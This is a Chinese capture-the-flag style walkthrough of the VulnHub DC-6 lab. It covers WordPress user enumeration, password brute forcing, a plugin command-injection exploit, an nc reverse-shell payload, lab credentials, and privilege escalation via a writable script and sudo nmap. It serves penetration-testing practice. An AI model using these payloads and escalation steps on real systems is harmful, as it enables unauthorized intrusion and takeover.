当前位置: 首页 > article >正文

vulnhub靶场【DC系列】之6

前言

靶机:DC-6,IP地址为192.168.10.10

攻击:kali,IP地址为192.168.10.2

都采用VMWare,网卡为桥接模式

对于文章中涉及到的靶场以及工具,我放置在网盘中,链接:https://pan.quark.cn/s/2ff9244bbf81

主机发现

使用arp-scan -l或者netdiscover -r 192.168.10.1/24

因为是靶机,所以在同一局域网中,这里使用这两个工具是因为在同一局域网中的扫描速度很快

当然,如果想要模拟真实渗透,建议使用nmap等扫描工具

使用nmap扫描192.168.10.0网段中的存活主机

nmap -sn 192.168.10.1/24

信息收集

使用nmap扫描端口

扫描目标的全端口,以及服务和操作系统信息

nmap -sV -O 192.168.10.10 -p-

网站信息探测

访问80端口默认界面,输入ip地址,跳转到wordy,说明可能是域名,需要进行绑定解析

编辑/etc/hosts文件,在其中添加ip以及域名进行绑定

再次访问网站,发现默认界面中的信息,发现CMS可能为wordpress

使用whatweb进一步进行探测,确定为wordpress,版本为5.1.1

whatweb http://wordy

那么这里就可以使用针对CMS为wordpress的扫描工具wpscan

wpscan --url http://wordy

漏洞寻找

继续使用wpscan尝试进行用户名枚举,发现五个用户

wpscan --url http://wordy -e u

尝试对这些用户进行密码爆破

wpscan --url http://wordy -e u -P /usr/share/wordlists/rockyou.txt

这里需要很长时间,所以这里再另起一个终端窗口,来做其他检测

这里进行目录扫描后,并未发现有隐藏或备份文件可用

再使用wpscan扫描插件有无漏洞可用,这里把检测模式改为具有侵略性的

wpscan --url http://wordy --detection-mode aggressive --plugins-detection aggressive -e ap

发现有三个插件,版本信息也都给出

使用searchsploit搜索有无对应的版本漏洞,最终确定plainview插件存在,但是需要认证后才能使用该漏洞

searchsploit plainview

但是这里还没有获取到密码,啧,这里去网上看了以下wp,确定是不是字典的问题,发现,在该靶机的主页,作者给出了提示。

描述

DC-6 是另一个专门建造的易受攻击实验室,旨在获得渗透测试领域的经验。

注意:您需要在渗透测试设备上编辑 hosts 文件,使其如下所示:

192.168.0.142 wordy

注意:我以 192.168.0.142 为例。您需要使用常规方法来确定 VM 的 IP 地址,并相应地进行调整。

线索
好吧,这并不是一个真正的线索,而是为那些只想继续工作的人提供的一些“我们不想花五年时间等待某个过程完成”的建议。

cat /usr/share/wordlists/rockyou.txt |grep k01 > passwords.txt 这应该可以为您节省几年时间。😉

确实是字典问题,如果按照原本的字典,啧啧啧

重新使用wpscan进行密码爆破

#先把rockyou.txt字典中的包含k01的每一行,都重定向到当前目录下的passwords.txt文件中
cat /usr/share/wordlists/rockyou.txt |grep k01 > passwords.txt

#使用当前作者提示的密码本进行密码爆破
wpscan --url http://wordy -e u -P passwords.txt

爆出用户名mark和密码helpdesk01

漏洞利用

结合前面的插件漏洞,我觉得可以了,查看前面的其中一个html文件

cat /usr/share/exploitdb/exploits/php/webapps/45274.html

这是自己构造的html界面,不过这里通过访问这个插件,发现也是可行的

这里我就不用提供的html,自己去访问靶机中的地址,然后按照顺序点击,可以看到,id命令执行成功

那么尝试构造一个反弹shell,测试是否能够成功,在尝试进行输入时,这里的输入框进行了一个长度的限制,所以需要借助浏览器开发者工具,修改其最大长度,这里默认是15,不过想改多大就多大

再经过测试,使用bash反弹,我这里未能成功,采用nc反弹成功获取shell

对于多种反弹shell方式,可以借助网站https://forum.ywhack.com/shell.php测试

#在输入框输入下面代码
127.0.0.1|nc -e /bin/sh 192.168.10.2 9999

然后在kali中使用nc进行监听端口

#在kali中
nc -lvvp 9999

然后在浏览器的界面中,点击lookup按钮,即可发现,反弹shell成功

使用dpkg获取靶机安装的python版本

dpkg -l | grep python

python3 -c 'import pty;pty.spawn("/bin/bash")'

提取

提权至用户graham

查看wordpress连接数据库的配置文件wp-config.php,不过其中的用户名并未对应到靶机内的几个用户,所以就暂时搁置,查看靶机内用户

ls -ls /home
cat /etc/passwd | grep /bin/bash

发现用户名mark,尝试使用之前获取的其密码helpdesk01进行ssh登录,发现不能登录

不过在其目录下,发现一个文件,该文件,记录了一些好东西

记录添加用户名graham,恰好这里的靶机内就有该用户,那么猜测后面的是其密码

使用该用户graham和密码GSo7isUM1D4进行ssh登录,发现成功

提权至用户jens

查看/home目录下的其他用户主目录,发现一个脚本文件,再使用find寻找具有SUID权限的文件

find / -type f -perm -u=s 2>/dev/null

查看该脚本文件,发现其他用户没有修改权限,不过这个组和用户不一样,就使用groups查看一下,发现两个用户grahamjens所属同一组devs

修改脚本文件,在其中添加/bin/bash即可,然后以jens执行sudo

sudo -u jens /home/jens/./backups.sh 

提权至root

提权至jens后,随手测试一下sudo -l,发现无需密码,并发现提权方式了

如果不知道如何使用nmap命令提权,可以借助网站gtfobins.github.io搜索方式

经测试,发现--interactive并无,所以无法使用第二个进行提取

采用第一种方式进行提取,这里需要注意,使用这个提取后,用户输入什么命令,都是不会显示的,只会显示结果的返回

TF=$(mktemp)
echo 'os.execute("/bin/bash")' > $TF
sudo nmap --script=$TF

清理痕迹这里就不说了,因为不显示输入,没什么效果

总结

该靶机主要考察以下几点:

  1. 对于网站CMS wordpress的了解,以及针对其CMS的工具wpscan的使用
  2. 对于无可利用点的使用,密码本可能是关键点
  3. 对于插件漏洞的搜索与使用,这里借助searchsploit搜索
  4. 命令执行的利用,以及反弹shell的几种方式
  5. 文件所属者、文件所属组、以及用户所属组的关系,这会间接的确定文件的权限问题
  6. sudo的提取,指定用户,即以指定用户的身份执行,或者直接以root的身份去执行

http://www.kler.cn/a/473463.html

相关文章:

  • 爬虫学习记录
  • Windows11环境下设置MySQL8字符集utf8mb4_unicode_ci
  • 成为LabVIEW自由开发者
  • el-table 多级表头
  • 嵌入式驱动开发详解10(MISC杂项实现)
  • asammdf python库解析MF4文件(一)cut and filter
  • Ubuntu18.04离线安装audit
  • vue -关于浏览器localstorge数据定期清除的实现
  • Windchill SQL 篇之 分类特征值相关
  • 什么时候用synchronized?什么时候用分布式锁?
  • Spring Boot 集成 Easysearch 完整指南
  • 老牌工具,16年依然抗打!
  • 【Java基础】使用Apache POI和Spring Boot实现Excel文件上传和解析功能
  • Linux下文件操作相关接口
  • 备考蓝桥杯:顺序表相关算法题
  • 软件工程实验-实验2 结构化分析与设计-总体设计和数据库设计
  • 数据库第一次作业-----数据库的多种部署方式
  • 代码随想录 day59 第十一章 图论part09
  • SQL Server中可以通过扩展事件来自动抓取阻塞
  • 攻防世界 ics-07
  • 51单片机——定时器中断(重点)
  • 全天候高效响应,中关村科金智能客服机器人优化客户体验
  • Hive部署内嵌模式、本地模式、远程模式
  • 现场展示deepseek VS openAI o1模型大对比
  • BI结合数据分析系统,为企业发展提供坚实的保障
  • WD5105同步降压转换器:9.2V-95V宽电压输入,4.5A大电流输出,95%高效率,多重保护功能